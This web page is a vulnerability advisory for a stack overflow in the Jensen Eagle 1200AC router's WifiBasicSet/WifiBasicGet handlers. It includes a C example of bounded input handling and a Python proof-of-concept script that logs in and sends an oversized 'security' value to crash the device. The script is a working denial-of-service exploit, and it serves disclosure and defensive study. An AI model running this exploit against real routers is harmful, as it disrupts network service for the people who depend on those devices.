URL: https://oxnan.com/posts/WifiBasic_security_DoS

[CVE-2023-24118] DOS VIA SECURITY PARAMETER IN EAGLE 1200AC

DESCRIPTION

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a
stack overflow via the security parameter at /goform/WifiBasicSet.

ADDITIONAL INFORMATION

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the
user-controlled string security is stored into wl2g.extra.security via SetValue.

When /goform/WifiBasicGet (formWifiBasicGet) is then called, the string is
loaded from wl2g.extra.security and copied into the stack buffer
wifi_buf_entry. Because the length of security is never checked, a large
string overflows the stack buffer.
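
A bounded version of the set/get flow described above, as an added example (not code from the advisory or from the vendor firmware). The function names, the 32-byte buffer size and the sample values are assumptions; only wl2g.extra.security and wifi_buf_entry come from the advisory.

```c
/* Added illustration: a simplified model, not the Eagle 1200AC firmware. */
#include <stdio.h>
#include <string.h>

#define SECURITY_MAX 32              /* assumed size of wifi_buf_entry */
static char cfg_security[4096];      /* stand-in for wl2g.extra.security */

/* Set path as described: the value is persisted without a length check. */
void set_security_unchecked(const char *value)
{
    snprintf(cfg_security, sizeof cfg_security, "%s", value);
}

/* Set path, hardened: refuse empty or over-long input before storing it. */
int set_security_checked(const char *value)
{
    size_t n = strlen(value);
    if (n == 0 || n >= SECURITY_MAX)
        return -1;
    memcpy(cfg_security, value, n + 1);
    return 0;
}

/* Get path, hardened. The flawed pattern is an unbounded copy of the stored
 * value into wifi_buf_entry (e.g. strcpy; the advisory does not name the
 * call), which writes past the stack buffer when the value is long. */
int get_security_bounded(char *out, size_t outlen)
{
    char wifi_buf_entry[SECURITY_MAX];
    int n = snprintf(wifi_buf_entry, sizeof wifi_buf_entry, "%s", cfg_security);
    if (n < 0 || (size_t)n >= sizeof wifi_buf_entry)
        return -1;                   /* stored value does not fit: reject */
    n = snprintf(out, outlen, "%s", wifi_buf_entry);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    char big[0x800 + 1], out[64] = "";
    memset(big, 'A', 0x800);         /* constructed over-long value */
    big[0x800] = '\0';
    printf("checked set, long value: %d\n", set_security_checked(big));
    set_security_unchecked(big);     /* long value already in the store */
    printf("bounded get, long value: %d\n", get_security_bounded(out, sizeof out));
    printf("checked set, short value: %d\n", set_security_checked("wpapsk"));
    printf("bounded get, short value: %d (%s)\n",
           get_security_bounded(out, sizeof out), out);
    return 0;
}
```

Checking on both paths matters: validation at set time stops new oversized values, while the bounded read protects against a value that is already stored.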

POC SCRIPT:

import requests

IP="192.168.38.1"

logindata = {
"username":"admin",
"password":"81dc9bdb52d04dc20036dbd8313ed055"
}

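def login():
	# Try to log in up to 10 times and return the "password" cookie
	# that the session holds after a successful login.
	for i in range(10):
		session = requests.Session()
		res = session.post(f"http://{IP}/login/Auth", data=logindata)
		try:
			passwd = session.cookies["password"]
			return passwd
		except KeyError:
			# Cookie not set on this attempt; retry.
			pass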

session = requests.Session()
session.cookies.set("password",login())

payload = {"security" : "A"*(0x800)}

res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
print(res.status_code)

res = session.post(f"http://{IP}/goform/WifiBasicGet")
print(res.text)
print(res)